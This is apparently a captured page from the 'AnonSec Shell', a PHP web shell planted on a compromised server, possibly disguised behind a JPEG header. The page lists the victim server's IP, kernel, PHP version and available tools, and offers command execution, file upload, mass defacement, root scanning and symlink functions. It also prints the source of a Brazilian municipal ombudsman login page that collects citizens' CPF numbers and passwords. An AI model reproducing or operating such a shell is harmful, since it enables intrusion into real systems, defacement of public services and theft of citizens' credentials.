JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/disk_so_ralp/var/www/html/siac/dev/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/disk_so_ralp/var/www/html/siac/dev/login.php
<?php
    session_start();
    if ($_GET["act"]=="logout") {
        unset($_SESSION['login']);
        unset($_SESSION['senha']);
        session_destroy();
    }
    include_once("conexaoBanco.php");
    //    include_once("aviso.php");
    $conn       = conexao::getInstance();
    $prefeitura = $conn->query("select * from orgao");
    $cliente    = $prefeitura->fetch(PDO::FETCH_OBJ);
    
    //GRAFICOS ATENDIMENTOS
    $grfresp = $conn->query("select * from sol_solicitacao where situacao='R'");
    $gresp   = $grfresp->rowCount(PDO::FETCH_OBJ);
    
    $grfaber = $conn->query("select * from sol_solicitacao where situacao='A'");
    $grabr   = $grfaber->rowCount(PDO::FETCH_OBJ);
    
    $grfnega = $conn->query("select * from sol_solicitacao where situacao='N'");
    $grneg   = $grfnega->rowCount(PDO::FETCH_OBJ);
    
    $grflido = $conn->query("select * from sol_solicitacao where situacao='L'");
    $grlid   = $grflido->rowCount(PDO::FETCH_OBJ);
    
    $grftram = $conn->query("select * from sol_solicitacao where situacao='T'");
    $grtrm   = $grftram->rowCount(PDO::FETCH_OBJ);
    
    //GRAFICOS SOLICITACOES
    $grfduv  = $conn->query("select * from sol_solicitacao where idtiposolicitacao='1'");
    $gduvi   = $grfduv->rowCount(PDO::FETCH_OBJ);
    $grfelo  = $conn->query("select * from sol_solicitacao where idtiposolicitacao='2'");
    $gelog   = $grfelo->rowCount(PDO::FETCH_OBJ);
    $grfrec  = $conn->query("select * from sol_solicitacao where idtiposolicitacao='3'");
    $grecl   = $grfrec->rowCount(PDO::FETCH_OBJ);
    $grfsug  = $conn->query("select * from sol_solicitacao where idtiposolicitacao='4'");
    $gsuge   = $grfsug->rowCount(PDO::FETCH_OBJ);
    $grfcri  = $conn->query("select * from sol_solicitacao where idtiposolicitacao='5'");
    $gcrit   = $grfcri->rowCount(PDO::FETCH_OBJ);
    $grfden  = $conn->query("select * from sol_solicitacao where idtiposolicitacao='6'");
    $gdenu   = $grfden->rowCount(PDO::FETCH_OBJ);
    $grfsol  = $conn->query("select * from sol_solicitacao where idtiposolicitacao='7'");
    $gsoli   = $grfsol->rowCount(PDO::FETCH_OBJ);
    $grfinf  = $conn->query("select * from sol_solicitacao where idtiposolicitacao='8'");
    $ginfo   = $grfinf->rowCount(PDO::FETCH_OBJ);
    $grfout  = $conn->query("select * from sol_solicitacao where idtiposolicitacao='9'");
    $goutr   = $grfout->rowCount(PDO::FETCH_OBJ);
    $grfanon = $conn->query("select * from sol_solicitacao where situacao='O'");
    $grano   = $grfanon->rowCount(PDO::FETCH_OBJ);
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>SIAC | Login</title>
    <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
    <link rel="icon" href="dist/img/favicon.png"/>
    <meta property="og:site_name" content="Sistema de Ouvidoria"/>
    <meta property="og:title" content="Sistema de Ouvidoria">
    <meta property="og:description" content="Sistema de gestão de Ouvidoria">
    <meta property="og:image" content="https://www.gtcontroller.com.br/mailing/sistemas/img/icone.jpg">
    <meta property="og:type" content="website">
    <meta property="og:url" content="https://www.gtcontroller.com.br/Ouvidoria/dev_new">
    <meta property="og:locale" content="pt_BR"/>
    <ToDO Barra mobile>
        <!--cor da barra mobile-->
        <meta name="theme-color" content="#00AFEF"/>
        <meta name="apple-mobile-web-app-status-bar-style" content="#00AFEF">
        <meta name="msapplication-navbutton-color" content="#00AFEF">
        <!--end cor da barra mobile-->
    </ToDO>

    <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>

    <!-- Tell the browser to be responsive to screen width -->
    <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
    <!-- Bootstrap 3.3.7 -->
    <link rel="stylesheet" href="components/bootstrap/dist/css/bootstrap.min.css">
    <!-- Font Awesome -->
    <link rel="stylesheet" href="components/font-awesome/css/font-awesome.min.css">
    <!-- Ionicons -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/4.4.8/collection/icon/icon.css">
    <!-- Theme style -->
    <link rel="stylesheet" href="dist/css/AdminLTE.min.css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->

    <link rel="stylesheet" href="dist/css/style.css">

    <!-- Google Font -->
    <link rel="stylesheet"
          href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic">
</head>

<!--<body class="login-page" style="background-color: rgb(255,255,255);">-->
<body class="login-page">

<div class="container">
    <div class="col-md-12">
        <div class="text-bold text-center">
            <h3 class="text-bold text-primary" style="color: white; text-shadow: black 0.1em 0.1em 0.2em;">SIAC -
                Sistema Integrado de Atendimento ao Cidadão</h3>
        </div>
        <!--LOGIN-->
        <div class="agile-login col-md-6">
            <div class="wrapper">
                <h2>Plataforma SIAC</h2>
                <!--<h4>&nbsp;&nbsp;&nbsp;</h4>-->
                <!--                <h5>Área do Solicitante</h5>-->
                <div class="w3ls-form">
                    <form method="post" action="loga.php" id="formlogin" name="formlogin">
                        <label>CPF</label>
                        <input type="text" name="txt_cpf" required/>
                        <label>Senha</label>
                        <input type="password" name="txt_senha" required/>
                        <!--<a href="#" class="pass">Forgot Password ?</a>-->
                        <input type="submit" value="Acessar sistema"/>
                    </form>
                </div>
                <div class="agile-icons">
                    <a class="text-bold text-green"
                       href="<?php echo $cliente->url_sistema ?>index2.php?page=solicitante/solicitante_n">
                        Criar cadastro!
                    </a>&nbsp;|&nbsp;
                    <a href="<?php echo $cliente->url_sistema ?>index2.php?page=solicitacao/solicitacao_anonima_n"
                       class="text-bold text-red">Solicitação Anônima
                    </a>
                </div>
            </div>
            <br>
        </div>
        <!--CONTATOS-->
        <div class="agile-login col-md-6">
            <div class="wrapper">
                <span class="logo-mini"><img src="dist/img/logo-prefeitura.png" width="160px"></span>
                <div class="w3ls-form">
                    <div class="agile-icons">
                        <label class="text-orange text-bold" style="font-size: 14px;">Endereço</label>
                        <h4 class="text-bold"><?php echo '<i class="fa fa-map-marker" style="padding: 0px; margin: 5px;"></i> ' . $cliente->rua . ', ' . $cliente->numero ?></h4>
                        <h4 class="text-bold"><?php echo '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;' . $cliente->bairro . ', ' . $cliente->cidade . '/' . $cliente->uf ?></h4>

                        <label class="text-orange text-bold" style="font-size: 14px;">Contato</label>
                        <h4 class="text-bold"><?php echo '<i class="fa fa-user" style="padding: 0px; margin: 5px;"></i>' . $cliente->responsavel_atendimento ?></h4>
                        <h4 class="text-bold"><?php echo '<i class="fa fa-phone-square" style="padding: 0px;margin: 5px;"></i>' . $cliente->fone ?></h4>
                        <h4 class="text-bold"><?php echo '<i class="fa fa-envelope" style="padding: 0px;margin: 5px;"></i>' . $cliente->email ?></h4>
                        <h4 class="text-bold"><?php echo '<i class="fa fa-calendar" style="padding: 0px;margin: 5px;"></i>' . $cliente->horario_atendimento ?></h4>
                        <h4 class="text-bold pull-left">
                            <a class="text-bold" target="_blank"
                               href="https://api.whatsapp.com/send?phone=<?php echo $cliente->celular_wap ?>&text=Contato"><?php echo $cliente->celular_wap ?>
                                <img src="dist/img/icon_whatsapp.png" width="20px"></a></h4>
                        <!--                        <label class="text-orange text-bold" style="font-size: 15px;">E-Mail</label>-->
                        <!--                        <h4 class="text-bold">--><?php //echo $cliente->email ?><!--</h4>-->
                    </div>
                </div>
            </div>
        </div>
        <!--GRAFICOS ATENDIMENTO-->
        <div class="col-md-12">
            <div class="agile-login col-md-6">
                <div class="wrapper">
                    <h3>ATENDIMENTOS</h3>
                    <!--                <h3>GRÁFICO</h3>-->
                    <h3>&nbsp;</h3>
                    <div class="w3ls-form">
                        <div id="chart_div"></div>
                    </div>
                    <?php
                        // dados do gráfico
                        $data = array(
                            array('Gráfico', 'Atendimento'),
                            array('Aberto', $grabr),
                            array('Negado', $grneg),
                            array('Tramitação', $grtrm),
                            array('Respondido', $gresp),
                            array('Lido', $grlid)
                        );
                    ?>

                    <script type="text/javascript">
                        google.charts.load('current', {'packages': ['corechart']});
                        google.charts.setOnLoadCallback(drawChart);

                        function drawChart() {
                            var data = google.visualization.arrayToDataTable(<?php echo json_encode($data); ?>);

                            var options = {
                                title: '',
                                is3D: true,
                                fontSize: 12,
                                backgroundColor: 'transparent',
                                chartArea: {top: 10, width: '100%', height: '100%'},
                            };

                            var chart = new google.visualization.PieChart(document.getElementById('chart_div'));
                            chart.draw(data, options);
                        }
                    </script>
                </div>
                <br>
                <h2>&nbsp;</h2>
            </div>
            <!--GRAFICOS TIPO SOLICITACAO-->
            <div class="agile-login col-md-6">
                <div class="wrapper">
                    <h3>SOLICITAÇÕES</h3>
                    <!--<h3>GRÁFICO</h3>-->
                    <h3>&nbsp;</h3>
                    <div class="w3ls-form">
                        <div id="chart_divTipo"></div>
                    </div>
                    <?php
                        // dados do gráfico
                        $data = array(
                            array('Gráfico', 'Atendimento'),
                            array('Dúvida', $gduvi),
                            array('Elógio', $gelog),
                            array('Reclamação', $grecl),
                            array('Sugestão', $gsuge),
                            array('Crítica', $gcrit),
                            array('Denuncia', $gdenu),
                            array('Solicitação', $gsoli),
                            array('Informação', $ginfo),
                            array('Outro', $goutr),
                            array('Anônimo', $grano)
                        );
                    ?>

                    <script type="text/javascript">
                        google.charts.load('current', {'packages': ['corechart']});
                        google.charts.setOnLoadCallback(drawChart);

                        function drawChart() {
                            var data = google.visualization.arrayToDataTable(<?php echo json_encode($data); ?>);

                            var options = {
                                title: '',
                                is3D: true,
                                fontSize: 12,
                                backgroundColor: 'transparent',
                                chartArea: {top: 10, width: '100%', height: '100%'},
                            };

                            var chart = new google.visualization.PieChart(document.getElementById('chart_divTipo'));
                            chart.draw(data, options);
                        }
                    </script>
                </div>
            </div>
            <br>
            <h2>&nbsp;</h2>
        </div>
        <!--INFORMACAO SOBRE A LAI-->
        <div class="agile-login col-md-12">
            <div class="wrapper" style="width: 100% !important;">
                <!--<span class="logo-mini"><img src="dist/img/logo-prefeitura.png" width="180px"></span>-->
                <div class="w3ls-form-lai" style="margin-left: 20px; margin-right: 20px;">
                    <div class="agile-icons">
                        <!--<label class="text-orange text-bold" style="font-size: 15px;">Sobre a LAI</label>-->
                        <h4 class="text-bold">Lei de Acesso à Informação (LAI) - nº 12.527/2011</h4>
                        <h4 class="text-bold">&nbsp;</h4>
                        <span class="text-left">
                            <h5 class="text-left">A <strong>LAI</strong> estabelece que os pedidos de informação podem ser feitos nas instalações físicas dos órgãos públicos ou através da Ouvidoria
                                do site. Ao fazer um pedido de informação, o cidadão receberá um número de protocolo e poderá acompanhar a tramitação do seu pedido de
                                informação.</h5>
                            <h5 class="text-bold">&nbsp;</h5>
                            <h5 class="text-left">Além disso, a lei estabelece que os órgãos públicos devem divulgar um conjunto mínimo de informações em suas seções de acesso à informação nos sites.
                                Essas informações são consideradas de interesse público e devem estar disponíveis para acesso de forma proativa.</h5>
                            <h5 class="text-bold">&nbsp;</h5>
                            <h5 class="text-left">É importante ressaltar que antes de fazer um pedido de acesso, é recomendável que o solicitante verifique se a informação desejada já está disponível
                                na seção de transparência do site ou se ela já foi publicada como resposta a uma outra solicitação de informações realizada anteriormente
                                através da Ouvidoria do site, que utiliza o e-SIC (Sistema Eletrônico de Informações ao Cidadão) desta entidade.</h5>
                            <h5 class="text-bold">&nbsp;</h5>
                            <h5 class="text-left">Abaixo, confira as regulamentações relativas a <strong>LAI</strong> nos âmbitos Municipal, Estadual e Federal.</h5>
                        </span>
                    </div>
                </div>
            </div>
            <br>
        </div>
        <!--BOTOES REGULAMENTACAO LAI-->
        <div class="agile-login col-md-4">
            <div class="">
                <div class="w3ls-form-lai" style="margin-left: 10px; margin-right: 10px; margin-top: 0px; !important;">
                    <div class="agile-icons">
                        <a class="btn btn-primary"
                           style="width: 100%; background-color: rgba(76,160,234,0.73); border-radius: 20px; padding-top: 15px; text-align: left;"
                           target="_blank" href=<?php echo $cliente->lai_municipal ?>>
                            <div id="diario_index_coluna_2" class="col-md-4">
                                <span style="font-size: 25px; float: left; margin-top: -8px; margin-right: 10px;"><img
                                            alt="Lai" src="dist/img/ponto-de-informacao.png" width="40"></span>

                                <p style="font-size: 13px; font-weight: 300; margin-top: 5px; margin-bottom: 0px; margin-left: 10px; line-height: 1.2;">
                                    Regulamentação LAI Municipal
                                </p>
                            </div>
                        </a>
                    </div>
                </div>
            </div>
        </div>
        <div class="agile-login col-md-4">
            <div class="">
                <div class="w3ls-form-lai" style="margin-left: 10px; margin-right: 10px; margin-top: 0px; !important;">
                    <div class="agile-icons">
                        <a class="btn btn-primary"
                           style="width: 100%; background-color: rgba(76,160,234,0.73); border-radius: 20px; padding-top: 15px; text-align: left;"
                           target="_blank" href=<?php echo $cliente->lai_estadual ?>>
                            <div id="diario_index_coluna_2" class="col-md-4">
                                <span style="font-size: 25px; float: left; margin-top: -8px; margin-right: 10px;"><img
                                            alt="Lai" src="dist/img/ponto-de-informacao.png" width="40"></span>

                              <p style="font-size: 13px; margin-top: 5px; margin-bottom: 5px; margin-left: 10px; line-height: 1.2;">
                                    Regulamentação LAI Estadual
                                </p>
                            </div>
                        </a>
                    </div>
                </div>
            </div>
        </div>
        <div class="agile-login col-md-4">
            <div class="">
                <div class="w3ls-form-lai" style="margin-left: 10px; margin-right: 10px; margin-top: 0px; !important;">
                    <div class="agile-icons">
                        <a class="btn btn-primary"
                           style="width: 100%; background-color: rgba(76,160,234,0.73); border-radius: 20px; padding-top: 15px; text-align: left;"
                           target="_blank" href=<?php echo $cliente->lai_federal ?>>
                            <div id="diario_index_coluna_2" class="col-md-4">
                                <span style="font-size: 25px; float: left; margin-top: -8px; margin-right: 10px;"><img
                                            alt="Lai" src="dist/img/ponto-de-informacao.png" width="40"></span>

                                <p style="font-size: 13px; font-weight: 300; margin-top: 5px; margin-bottom: 0px; margin-left: 10px; line-height: 1.2;">
                                    Regulamentação LAI Federal
                                </p>
                            </div>
                        </a>
                    </div>
                </div>
            </div>
        </div>

        <!--SECAO PERGUNTAS E RESPOSTAS-->
        <div class="agile-login col-md-12" style="width: 100%; !important;" hidden>
            <div class="wrapper">
                <div class="w3ls-form-lai" style="margin-left: 10px; margin-right: 10px; margin-top: 0px; !important;">
                    <div class="agile-icons">
                        <h4 class="text-bold">Perguntas e Respostas sobre a <strong>LAI</strong></h4>
                    </div>

                </div>
            </div>
        </div>
    </div>

    <!-- Cookie Consent by FreePrivacyPolicy.com https://www.FreePrivacyPolicy.com -->
    <h4 class="text-bold">&nbsp;</h4>
    <script type="text/javascript" src="//www.freeprivacypolicy.com/public/cookie-consent/4.1.0/cookie-consent.js"
            charset="UTF-8"></script>
    <script type="text/javascript" charset="UTF-8">
        document.addEventListener('DOMContentLoaded', function () {
            cookieconsent.run({
                "notice_banner_type": "headline",
                "consent_type": "express",
                "palette": "light",
                "language": "pt",
                "page_load_consent_levels": ["strictly-necessary"],
                "notice_banner_reject_button_hide": false,
                "preferences_center_close_button_hide": false,
                "page_refresh_confirmation_buttons": false,
                "website_name": "SIAC",
                "website_privacy_policy_url": "https://www.gtcontroller.com.br/politica.html"
            });
        });
    </script>
    <div class="col-md-12">
        <div class="wrapper" style="width: 80% !important;">
            <div class="w3ls-form-lai" style="margin-left: 10px; margin-right: 10px; margin-top: 1px; !important;">
                <p>Política de Privacidade</p>
                <p style="font-size: 10px;">O SIAC utiliza cookies para melhorar a sua experiência, de acordo com a
                    nossa
                    <a target="_blank" href="https://www.gtcontroller.com.br/politica.html">Política
                        de Privacidade</a>, ao continuar navegando, você concorda com estas condições.</p>
                <a href="#" id="open_preferences_center">Editar preferências de cookies</a>
            </div>
        </div>
    </div>
    <!-- Cookie Consent by FreePrivacyPolicy.com https://www.FreePrivacyPolicy.com -->

</div>

<!--LOGO EMPRESA-->
<footer class="container text-center">
    <div class="row">
        <div class="col-md-12">
            <div class="agile-icons text-bold">
                <img src="dist/img/logo_gt_vertical.png" class="center-block" width="15%"></img>
            </div>
            <br>
        </div>
    </div>
</footer>

<div vw class="enabled">
    <div vw-access-button class="active"></div>
    <div vw-plugin-wrapper>
        <div class="vw-plugin-top-wrapper"></div>
    </div>
</div>
<script src="https://vlibras.gov.br/app/vlibras-plugin.js"></script>
<script>
    new window.VLibras.Widget('https://vlibras.gov.br/app');
</script>
</body>
</html>






Anon7 - 2022
AnonSec Team